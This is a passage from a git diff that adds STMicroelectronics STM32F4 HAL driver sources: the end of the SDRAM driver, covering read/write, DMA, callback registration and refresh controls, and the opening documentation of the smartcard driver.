that contains + * the configuration information for SDRAM module. + * @retval None + */ +__weak void HAL_SDRAM_MspInit(SDRAM_HandleTypeDef *hsdram) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsdram); + /* NOTE: This function Should not be modified, when the callback is needed, + the HAL_SDRAM_MspInit could be implemented in the user file + */ +} + +/** + * @brief SDRAM MSP DeInit. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @retval None + */ +__weak void HAL_SDRAM_MspDeInit(SDRAM_HandleTypeDef *hsdram) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsdram); + /* NOTE: This function Should not be modified, when the callback is needed, + the HAL_SDRAM_MspDeInit could be implemented in the user file + */ +} + +/** + * @brief This function handles SDRAM refresh error interrupt request. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @retval HAL status +*/ +void HAL_SDRAM_IRQHandler(SDRAM_HandleTypeDef *hsdram) +{ + /* Check SDRAM interrupt Rising edge flag */ + if(__FMC_SDRAM_GET_FLAG(hsdram->Instance, FMC_SDRAM_FLAG_REFRESH_IT)) + { + /* SDRAM refresh error interrupt callback */ +#if (USE_HAL_SDRAM_REGISTER_CALLBACKS == 1) + hsdram->RefreshErrorCallback(hsdram); +#else + HAL_SDRAM_RefreshErrorCallback(hsdram); +#endif + + /* Clear SDRAM refresh error interrupt pending bit */ + __FMC_SDRAM_CLEAR_FLAG(hsdram->Instance, FMC_SDRAM_FLAG_REFRESH_ERROR); + } +} + +/** + * @brief SDRAM Refresh error callback. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @retval None + */ +__weak void HAL_SDRAM_RefreshErrorCallback(SDRAM_HandleTypeDef *hsdram) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsdram); + /* NOTE: This function Should not be modified, when the callback is needed, + the HAL_SDRAM_RefreshErrorCallback could be implemented in the user file + */ +} + +/** + * @brief DMA transfer complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +__weak void HAL_SDRAM_DMA_XferCpltCallback(DMA_HandleTypeDef *hdma) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdma); + /* NOTE: This function Should not be modified, when the callback is needed, + the HAL_SDRAM_DMA_XferCpltCallback could be implemented in the user file + */ +} + +/** + * @brief DMA transfer complete error callback. + * @param hdma DMA handle + * @retval None + */ +__weak void HAL_SDRAM_DMA_XferErrorCallback(DMA_HandleTypeDef *hdma) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdma); + /* NOTE: This function Should not be modified, when the callback is needed, + the HAL_SDRAM_DMA_XferErrorCallback could be implemented in the user file + */ +} +/** + * @} + */ + +/** @defgroup SDRAM_Exported_Functions_Group2 Input and Output functions + * @brief Input Output and memory control functions + * + @verbatim + ============================================================================== + ##### SDRAM Input and Output functions ##### + ============================================================================== + [..] + This section provides functions allowing to use and control the SDRAM memory + +@endverbatim + * @{ + */ + +/** + * @brief Reads 8-bit data buffer from the SDRAM memory. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @param pAddress Pointer to read start address + * @param pDstBuffer Pointer to destination buffer + * @param BufferSize Size of the buffer to read from memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_Read_8b(SDRAM_HandleTypeDef *hsdram, uint32_t *pAddress, uint8_t *pDstBuffer, uint32_t BufferSize) +{ + __IO uint8_t *pSdramAddress = (uint8_t *)pAddress; + + /* Process Locked */ + __HAL_LOCK(hsdram); + + /* Check the SDRAM controller state */ + if(hsdram->State == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + else if(hsdram->State == HAL_SDRAM_STATE_PRECHARGED) + { + return HAL_ERROR; + } + + /* Read data from source */ + for(; BufferSize != 0U; BufferSize--) + { + *pDstBuffer = *(__IO uint8_t *)pSdramAddress; + pDstBuffer++; + pSdramAddress++; + } + + /* Process Unlocked */ + __HAL_UNLOCK(hsdram); + + return HAL_OK; +} + +/** + * @brief Writes 8-bit data buffer to SDRAM memory. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @param pAddress Pointer to write start address + * @param pSrcBuffer Pointer to source buffer to write + * @param BufferSize Size of the buffer to write to memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_Write_8b(SDRAM_HandleTypeDef *hsdram, uint32_t *pAddress, uint8_t *pSrcBuffer, uint32_t BufferSize) +{ + __IO uint8_t *pSdramAddress = (uint8_t *)pAddress; + uint32_t tmp = 0U; + + /* Process Locked */ + __HAL_LOCK(hsdram); + + /* Check the SDRAM controller state */ + tmp = hsdram->State; + + if(tmp == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + else if((tmp == HAL_SDRAM_STATE_PRECHARGED) || (tmp == HAL_SDRAM_STATE_WRITE_PROTECTED)) + { + return HAL_ERROR; + } + + /* Write data to memory */ + for(; BufferSize != 0U; BufferSize--) + { + *(__IO uint8_t *)pSdramAddress = *pSrcBuffer; + pSrcBuffer++; + pSdramAddress++; + } + + /* Process Unlocked */ + __HAL_UNLOCK(hsdram); + + return HAL_OK; +} + +/** + * @brief Reads 16-bit data buffer from the SDRAM memory. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @param pAddress Pointer to read start address + * @param pDstBuffer Pointer to destination buffer + * @param BufferSize Size of the buffer to read from memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_Read_16b(SDRAM_HandleTypeDef *hsdram, uint32_t *pAddress, uint16_t *pDstBuffer, uint32_t BufferSize) +{ + __IO uint16_t *pSdramAddress = (uint16_t *)pAddress; + + /* Process Locked */ + __HAL_LOCK(hsdram); + + /* Check the SDRAM controller state */ + if(hsdram->State == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + else if(hsdram->State == HAL_SDRAM_STATE_PRECHARGED) + { + return HAL_ERROR; + } + + /* Read data from source */ + for(; BufferSize != 0U; BufferSize--) + { + *pDstBuffer = *(__IO uint16_t *)pSdramAddress; + pDstBuffer++; + pSdramAddress++; + } + + /* Process Unlocked */ + __HAL_UNLOCK(hsdram); + + return HAL_OK; +} + +/** + * @brief Writes 16-bit data buffer to SDRAM memory. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @param pAddress Pointer to write start address + * @param pSrcBuffer Pointer to source buffer to write + * @param BufferSize Size of the buffer to write to memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_Write_16b(SDRAM_HandleTypeDef *hsdram, uint32_t *pAddress, uint16_t *pSrcBuffer, uint32_t BufferSize) +{ + __IO uint16_t *pSdramAddress = (uint16_t *)pAddress; + uint32_t tmp = 0U; + + /* Process Locked */ + __HAL_LOCK(hsdram); + + /* Check the SDRAM controller state */ + tmp = hsdram->State; + + if(tmp == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + else if((tmp == HAL_SDRAM_STATE_PRECHARGED) || (tmp == HAL_SDRAM_STATE_WRITE_PROTECTED)) + { + return HAL_ERROR; + } + + /* Write data to memory */ + for(; BufferSize != 0U; BufferSize--) + { + *(__IO uint16_t *)pSdramAddress = *pSrcBuffer; + pSrcBuffer++; + pSdramAddress++; + } + + /* Process Unlocked */ + __HAL_UNLOCK(hsdram); + + return HAL_OK; +} + +/** + * @brief Reads 32-bit data buffer from the SDRAM memory. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @param pAddress Pointer to read start address + * @param pDstBuffer Pointer to destination buffer + * @param BufferSize Size of the buffer to read from memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_Read_32b(SDRAM_HandleTypeDef *hsdram, uint32_t *pAddress, uint32_t *pDstBuffer, uint32_t BufferSize) +{ + __IO uint32_t *pSdramAddress = (uint32_t *)pAddress; + + /* Process Locked */ + __HAL_LOCK(hsdram); + + /* Check the SDRAM controller state */ + if(hsdram->State == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + else if(hsdram->State == HAL_SDRAM_STATE_PRECHARGED) + { + return HAL_ERROR; + } + + /* Read data from source */ + for(; BufferSize != 0U; BufferSize--) + { + *pDstBuffer = *(__IO uint32_t *)pSdramAddress; + pDstBuffer++; + pSdramAddress++; + } + + /* Process Unlocked */ + __HAL_UNLOCK(hsdram); + + return HAL_OK; +} + +/** + * @brief Writes 32-bit data buffer to SDRAM memory. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @param pAddress Pointer to write start address + * @param pSrcBuffer Pointer to source buffer to write + * @param BufferSize Size of the buffer to write to memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_Write_32b(SDRAM_HandleTypeDef *hsdram, uint32_t *pAddress, uint32_t *pSrcBuffer, uint32_t BufferSize) +{ + __IO uint32_t *pSdramAddress = (uint32_t *)pAddress; + uint32_t tmp = 0U; + + /* Process Locked */ + __HAL_LOCK(hsdram); + + /* Check the SDRAM controller state */ + tmp = hsdram->State; + + if(tmp == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + else if((tmp == HAL_SDRAM_STATE_PRECHARGED) || (tmp == HAL_SDRAM_STATE_WRITE_PROTECTED)) + { + return HAL_ERROR; + } + + /* Write data to memory */ + for(; BufferSize != 0U; BufferSize--) + { + *(__IO uint32_t *)pSdramAddress = *pSrcBuffer; + pSrcBuffer++; + pSdramAddress++; + } + + /* Process Unlocked */ + __HAL_UNLOCK(hsdram); + + return HAL_OK; +} + +/** + * @brief Reads a Words data from the SDRAM memory using DMA transfer. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @param pAddress Pointer to read start address + * @param pDstBuffer Pointer to destination buffer + * @param BufferSize Size of the buffer to read from memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_Read_DMA(SDRAM_HandleTypeDef *hsdram, uint32_t *pAddress, uint32_t *pDstBuffer, uint32_t BufferSize) +{ + uint32_t tmp = 0U; + + /* Process Locked */ + __HAL_LOCK(hsdram); + + /* Check the SDRAM controller state */ + tmp = hsdram->State; + + if(tmp == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + else if(tmp == HAL_SDRAM_STATE_PRECHARGED) + { + return HAL_ERROR; + } + + /* Configure DMA user callbacks */ + hsdram->hdma->XferCpltCallback = HAL_SDRAM_DMA_XferCpltCallback; + hsdram->hdma->XferErrorCallback = HAL_SDRAM_DMA_XferErrorCallback; + + /* Enable the DMA Stream */ + HAL_DMA_Start_IT(hsdram->hdma, (uint32_t)pAddress, (uint32_t)pDstBuffer, (uint32_t)BufferSize); + + /* Process Unlocked */ + __HAL_UNLOCK(hsdram); + + return HAL_OK; +} + +/** + * @brief Writes a Words data buffer to SDRAM memory using DMA transfer. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @param pAddress Pointer to write start address + * @param pSrcBuffer Pointer to source buffer to write + * @param BufferSize Size of the buffer to write to memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_Write_DMA(SDRAM_HandleTypeDef *hsdram, uint32_t *pAddress, uint32_t *pSrcBuffer, uint32_t BufferSize) +{ + uint32_t tmp = 0U; + + /* Process Locked */ + __HAL_LOCK(hsdram); + + /* Check the SDRAM controller state */ + tmp = hsdram->State; + + if(tmp == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + else if((tmp == HAL_SDRAM_STATE_PRECHARGED) || (tmp == HAL_SDRAM_STATE_WRITE_PROTECTED)) + { + return HAL_ERROR; + } + + /* Configure DMA user callbacks */ + hsdram->hdma->XferCpltCallback = HAL_SDRAM_DMA_XferCpltCallback; + hsdram->hdma->XferErrorCallback = HAL_SDRAM_DMA_XferErrorCallback; + + /* Enable the DMA Stream */ + HAL_DMA_Start_IT(hsdram->hdma, (uint32_t)pSrcBuffer, (uint32_t)pAddress, (uint32_t)BufferSize); + + /* Process Unlocked */ + __HAL_UNLOCK(hsdram); + + return HAL_OK; +} + +#if (USE_HAL_SDRAM_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User SDRAM Callback + * To be used instead of the weak (surcharged) predefined callback + * @param hsdram : SDRAM handle + * @param CallbackId : ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_SDRAM_MSP_INIT_CB_ID SDRAM MspInit callback ID + * @arg @ref HAL_SDRAM_MSP_DEINIT_CB_ID SDRAM MspDeInit callback ID + * @arg @ref HAL_SDRAM_REFRESH_ERR_CB_ID SDRAM Refresh Error callback ID + * @param pCallback : pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_SDRAM_RegisterCallback (SDRAM_HandleTypeDef *hsdram, HAL_SDRAM_CallbackIDTypeDef CallbackId, pSDRAM_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + HAL_SDRAM_StateTypeDef state; + + if(pCallback == NULL) + { + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hsdram); + + state = hsdram->State; + if((state == HAL_SDRAM_STATE_READY) || (state == HAL_SDRAM_STATE_WRITE_PROTECTED)) + { + switch (CallbackId) + { + case HAL_SDRAM_MSP_INIT_CB_ID : + hsdram->MspInitCallback = pCallback; + break; + case HAL_SDRAM_MSP_DEINIT_CB_ID : + hsdram->MspDeInitCallback = pCallback; + break; + case HAL_SDRAM_REFRESH_ERR_CB_ID : + hsdram->RefreshErrorCallback = pCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if(hsdram->State == HAL_SDRAM_STATE_RESET) + { + switch (CallbackId) + { + case HAL_SDRAM_MSP_INIT_CB_ID : + hsdram->MspInitCallback = pCallback; + break; + case HAL_SDRAM_MSP_DEINIT_CB_ID : + hsdram->MspDeInitCallback = pCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsdram); + return status; +} + +/** + * @brief Unregister a User SDRAM Callback + * SDRAM Callback is redirected to the weak (surcharged) predefined callback + * @param hsdram : SDRAM handle + * @param CallbackId : ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_SDRAM_MSP_INIT_CB_ID SDRAM MspInit callback ID + * @arg @ref HAL_SDRAM_MSP_DEINIT_CB_ID SDRAM MspDeInit callback ID + * @arg @ref HAL_SDRAM_REFRESH_ERR_CB_ID SDRAM Refresh Error callback ID + * @arg @ref HAL_SDRAM_DMA_XFER_CPLT_CB_ID SDRAM DMA Xfer Complete callback ID + * @arg @ref HAL_SDRAM_DMA_XFER_ERR_CB_ID SDRAM DMA Xfer Error callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_SDRAM_UnRegisterCallback (SDRAM_HandleTypeDef *hsdram, HAL_SDRAM_CallbackIDTypeDef CallbackId) +{ + HAL_StatusTypeDef status = HAL_OK; + HAL_SDRAM_StateTypeDef state; + + /* Process locked */ + __HAL_LOCK(hsdram); + + state = hsdram->State; + if((state == HAL_SDRAM_STATE_READY) || (state == HAL_SDRAM_STATE_WRITE_PROTECTED)) + { + switch (CallbackId) + { + case HAL_SDRAM_MSP_INIT_CB_ID : + hsdram->MspInitCallback = HAL_SDRAM_MspInit; + break; + case HAL_SDRAM_MSP_DEINIT_CB_ID : + hsdram->MspDeInitCallback = HAL_SDRAM_MspDeInit; + break; + case HAL_SDRAM_REFRESH_ERR_CB_ID : + hsdram->RefreshErrorCallback = HAL_SDRAM_RefreshErrorCallback; + break; + case HAL_SDRAM_DMA_XFER_CPLT_CB_ID : + hsdram->DmaXferCpltCallback = HAL_SDRAM_DMA_XferCpltCallback; + break; + case HAL_SDRAM_DMA_XFER_ERR_CB_ID : + hsdram->DmaXferErrorCallback = HAL_SDRAM_DMA_XferErrorCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if(hsdram->State == HAL_SDRAM_STATE_RESET) + { + switch (CallbackId) + { + case HAL_SDRAM_MSP_INIT_CB_ID : + hsdram->MspInitCallback = HAL_SDRAM_MspInit; + break; + case HAL_SDRAM_MSP_DEINIT_CB_ID : + hsdram->MspDeInitCallback = HAL_SDRAM_MspDeInit; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsdram); + return status; +} + +/** + * @brief Register a User SDRAM Callback for DMA transfers + * To be used instead of the weak (surcharged) predefined callback + * @param hsdram : SDRAM handle + * @param CallbackId : ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_SDRAM_DMA_XFER_CPLT_CB_ID SDRAM DMA Xfer Complete callback ID + * @arg @ref HAL_SDRAM_DMA_XFER_ERR_CB_ID SDRAM DMA Xfer Error callback ID + * @param pCallback : pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_SDRAM_RegisterDmaCallback(SDRAM_HandleTypeDef *hsdram, HAL_SDRAM_CallbackIDTypeDef CallbackId, pSDRAM_DmaCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + HAL_SDRAM_StateTypeDef state; + + if(pCallback == NULL) + { + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hsdram); + + state = hsdram->State; + if((state == HAL_SDRAM_STATE_READY) || (state == HAL_SDRAM_STATE_WRITE_PROTECTED)) + { + switch (CallbackId) + { + case HAL_SDRAM_DMA_XFER_CPLT_CB_ID : + hsdram->DmaXferCpltCallback = pCallback; + break; + case HAL_SDRAM_DMA_XFER_ERR_CB_ID : + hsdram->DmaXferErrorCallback = pCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsdram); + return status; +} +#endif + +/** + * @} + */ + +/** @defgroup SDRAM_Exported_Functions_Group3 Control functions + * @brief management functions + * +@verbatim + ============================================================================== + ##### SDRAM Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control dynamically + the SDRAM interface. + +@endverbatim + * @{ + */ + +/** + * @brief Enables dynamically SDRAM write protection. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_WriteProtection_Enable(SDRAM_HandleTypeDef *hsdram) +{ + /* Check the SDRAM controller state */ + if(hsdram->State == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Update the SDRAM state */ + hsdram->State = HAL_SDRAM_STATE_BUSY; + + /* Enable write protection */ + FMC_SDRAM_WriteProtection_Enable(hsdram->Instance, hsdram->Init.SDBank); + + /* Update the SDRAM state */ + hsdram->State = HAL_SDRAM_STATE_WRITE_PROTECTED; + + return HAL_OK; +} + +/** + * @brief Disables dynamically SDRAM write protection. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_WriteProtection_Disable(SDRAM_HandleTypeDef *hsdram) +{ + /* Check the SDRAM controller state */ + if(hsdram->State == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Update the SDRAM state */ + hsdram->State = HAL_SDRAM_STATE_BUSY; + + /* Disable write protection */ + FMC_SDRAM_WriteProtection_Disable(hsdram->Instance, hsdram->Init.SDBank); + + /* Update the SDRAM state */ + hsdram->State = HAL_SDRAM_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Sends Command to the SDRAM bank. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @param Command SDRAM command structure + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_SendCommand(SDRAM_HandleTypeDef *hsdram, FMC_SDRAM_CommandTypeDef *Command, uint32_t Timeout) +{ + /* Check the SDRAM controller state */ + if(hsdram->State == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Update the SDRAM state */ + hsdram->State = HAL_SDRAM_STATE_BUSY; + + /* Send SDRAM command */ + FMC_SDRAM_SendCommand(hsdram->Instance, Command, Timeout); + + /* Update the SDRAM controller state */ + if(Command->CommandMode == FMC_SDRAM_CMD_PALL) + { + hsdram->State = HAL_SDRAM_STATE_PRECHARGED; + } + else + { + hsdram->State = HAL_SDRAM_STATE_READY; + } + + return HAL_OK; +} + +/** + * @brief Programs the SDRAM Memory Refresh rate. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @param RefreshRate The SDRAM refresh rate value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_ProgramRefreshRate(SDRAM_HandleTypeDef *hsdram, uint32_t RefreshRate) +{ + /* Check the SDRAM controller state */ + if(hsdram->State == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Update the SDRAM state */ + hsdram->State = HAL_SDRAM_STATE_BUSY; + + /* Program the refresh rate */ + FMC_SDRAM_ProgramRefreshRate(hsdram->Instance ,RefreshRate); + + /* Update the SDRAM state */ + hsdram->State = HAL_SDRAM_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Sets the Number of consecutive SDRAM Memory auto Refresh commands. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @param AutoRefreshNumber The SDRAM auto Refresh number + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_SetAutoRefreshNumber(SDRAM_HandleTypeDef *hsdram, uint32_t AutoRefreshNumber) +{ + /* Check the SDRAM controller state */ + if(hsdram->State == HAL_SDRAM_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Update the SDRAM state */ + hsdram->State = HAL_SDRAM_STATE_BUSY; + + /* Set the Auto-Refresh number */ + FMC_SDRAM_SetAutoRefreshNumber(hsdram->Instance ,AutoRefreshNumber); + + /* Update the SDRAM state */ + hsdram->State = HAL_SDRAM_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Returns the SDRAM memory current mode. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @retval The SDRAM memory mode. + */ +uint32_t HAL_SDRAM_GetModeStatus(SDRAM_HandleTypeDef *hsdram) +{ + /* Return the SDRAM memory current mode */ + return(FMC_SDRAM_GetModeStatus(hsdram->Instance, hsdram->Init.SDBank)); +} + +/** + * @} + */ + +/** @defgroup SDRAM_Exported_Functions_Group4 State functions + * @brief Peripheral State functions + * +@verbatim + ============================================================================== + ##### SDRAM State functions ##### + ============================================================================== + [..] + This subsection permits to get in run-time the status of the SDRAM controller + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Returns the SDRAM state. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @retval HAL state + */ +HAL_SDRAM_StateTypeDef HAL_SDRAM_GetState(SDRAM_HandleTypeDef *hsdram) +{ + return hsdram->State; +} + +/** + * @} + */ + +/** + * @} + */ +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F446xx || STM32F469xx || STM32F479xx */ +#endif /* HAL_SDRAM_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_smartcard.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_smartcard.c new file mode 100644 index 000000000..6746744c0 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_smartcard.c @@ -0,0 +1,2363 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_smartcard.c + * @author MCD Application Team + * @brief SMARTCARD HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the SMARTCARD peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State and Error functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The SMARTCARD HAL driver can be used as follows: + + (#) Declare a SMARTCARD_HandleTypeDef handle structure. + (#) Initialize the SMARTCARD low level resources by implementing the HAL_SMARTCARD_MspInit() API: + (##) Enable the interface clock of the USARTx associated to the SMARTCARD. + (##) SMARTCARD pins configuration: + (+++) Enable the clock for the SMARTCARD GPIOs. + (+++) Configure SMARTCARD pins as alternate function pull-up. + (##) NVIC configuration if you need to use interrupt process (HAL_SMARTCARD_Transmit_IT() + and HAL_SMARTCARD_Receive_IT() APIs): + (+++) Configure the USARTx interrupt priority. + (+++) Enable the NVIC USART IRQ handle. + (##) DMA Configuration if you need to use DMA process (HAL_SMARTCARD_Transmit_DMA() + and HAL_SMARTCARD_Receive_DMA() APIs): + (+++) Declare a DMA handle structure for the Tx/Rx stream. + (+++) Enable the DMAx interface clock. + (+++) Configure the declared DMA handle structure with the required Tx/Rx parameters. + (+++) Configure the DMA Tx/Rx stream. + (+++) Associate the initialized DMA handle to the SMARTCARD DMA Tx/Rx handle. + (+++) Configure the priority and enable the NVIC for the transfer complete interrupt on the DMA Tx/Rx stream. + (+++) Configure the USARTx interrupt priority and enable the NVIC USART IRQ handle + (used for last byte sending completion detection in DMA non circular mode) + + (#) Program the Baud Rate, Word Length , Stop Bit, Parity, Hardware + flow control and Mode(Receiver/Transmitter) in the SMARTCARD Init structure. + + (#) Initialize the SMARTCARD registers by calling the HAL_SMARTCARD_Init() API: + (++) These APIs configure also the low level Hardware GPIO, CLOCK, CORTEX...etc) + by calling the customized HAL_SMARTCARD_MspInit() API. + [..] + (@) The specific SMARTCARD interrupts (Transmission complete interrupt, + RXNE interrupt and Error Interrupts) will be managed using the macros + __HAL_SMARTCARD_ENABLE_IT() and __HAL_SMARTCARD_DISABLE_IT() inside the transmit and receive process. + + [..] + Three operation modes are available within this driver : + + *** Polling mode IO operation *** + ================================= + [..] + (+) Send an amount of data in blocking mode using HAL_SMARTCARD_Transmit() + (+) Receive an amount of data in blocking mode using HAL_SMARTCARD_Receive() + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Send an amount of data in non blocking mode using HAL_SMARTCARD_Transmit_IT() + (+) At transmission end of transfer HAL_SMARTCARD_TxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_SMARTCARD_TxCpltCallback + (+) Receive an amount of data in non blocking mode using HAL_SMARTCARD_Receive_IT() + (+) At reception end of transfer HAL_SMARTCARD_RxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_SMARTCARD_RxCpltCallback + (+) In case of transfer Error, HAL_SMARTCARD_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_SMARTCARD_ErrorCallback + + *** DMA mode IO operation *** + ============================== + [..] + (+) Send an amount of data in non blocking mode (DMA) using HAL_SMARTCARD_Transmit_DMA() + (+) At transmission end of transfer HAL_SMARTCARD_TxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_SMARTCARD_TxCpltCallback + (+) Receive an amount of data in non blocking mode (DMA) using HAL_SMARTCARD_Receive_DMA() + (+) At reception end of transfer HAL_SMARTCARD_RxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_SMARTCARD_RxCpltCallback + (+) In case of transfer Error, HAL_SMARTCARD_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_SMARTCARD_ErrorCallback + + *** SMARTCARD HAL driver macros list *** + ======================================== + [..] + Below the list of most used macros in SMARTCARD HAL driver. + + (+) __HAL_SMARTCARD_ENABLE: Enable the SMARTCARD peripheral + (+) __HAL_SMARTCARD_DISABLE: Disable the SMARTCARD peripheral + (+) __HAL_SMARTCARD_GET_FLAG : Check whether the specified SMARTCARD flag is set or not + (+) __HAL_SMARTCARD_CLEAR_FLAG : Clear the specified SMARTCARD pending flag + (+) __HAL_SMARTCARD_ENABLE_IT: Enable the specified SMARTCARD interrupt + (+) __HAL_SMARTCARD_DISABLE_IT: Disable the specified SMARTCARD interrupt + + [..] + (@) You can refer to the SMARTCARD HAL driver header file for more useful macros + + ##### Callback registration ##### + ================================== + + [..] + The compilation define USE_HAL_SMARTCARD_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + [..] + Use Function HAL_SMARTCARD_RegisterCallback() to register a user callback. + Function HAL_SMARTCARD_RegisterCallback() allows to register following callbacks: + (+) TxCpltCallback : Tx Complete Callback. + (+) RxCpltCallback : Rx Complete Callback. + (+) ErrorCallback : Error Callback. + (+) AbortCpltCallback : Abort Complete Callback. + (+) AbortTransmitCpltCallback : Abort Transmit Complete Callback. + (+) AbortReceiveCpltCallback : Abort Receive Complete Callback. + (+) MspInitCallback : SMARTCARD MspInit. + (+) MspDeInitCallback : SMARTCARD MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + [..] + Use function HAL_SMARTCARD_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. + HAL_SMARTCARD_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) TxCpltCallback : Tx Complete Callback. + (+) RxCpltCallback : Rx Complete Callback. + (+) ErrorCallback : Error Callback. + (+) AbortCpltCallback : Abort Complete Callback. + (+) AbortTransmitCpltCallback : Abort Transmit Complete Callback. + (+) AbortReceiveCpltCallback : Abort Receive Complete Callback. + (+) MspInitCallback : SMARTCARD MspInit. + (+) MspDeInitCallback : SMARTCARD 